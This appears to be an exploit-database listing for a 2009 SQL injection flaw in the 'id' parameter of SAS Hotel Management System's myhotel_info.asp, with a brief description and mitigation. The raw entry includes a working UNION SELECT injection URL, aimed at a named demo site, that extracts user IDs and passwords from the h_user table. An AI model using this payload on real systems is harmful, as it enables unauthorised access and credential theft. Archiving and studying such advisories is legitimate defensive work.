header-logo
Suggest Exploit
vendor:
SAS Hotel Management System
by:
DarkB0x
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SAS Hotel Management System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SAS Hotel Management System

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of 'myhotel_info.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to sensitive information, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX

#script           : SAS Hotel Management System
#download         : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo             : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD

# milw0rm.com [2009-02-16]

Navigation

Suggest Exploit

Services By CQR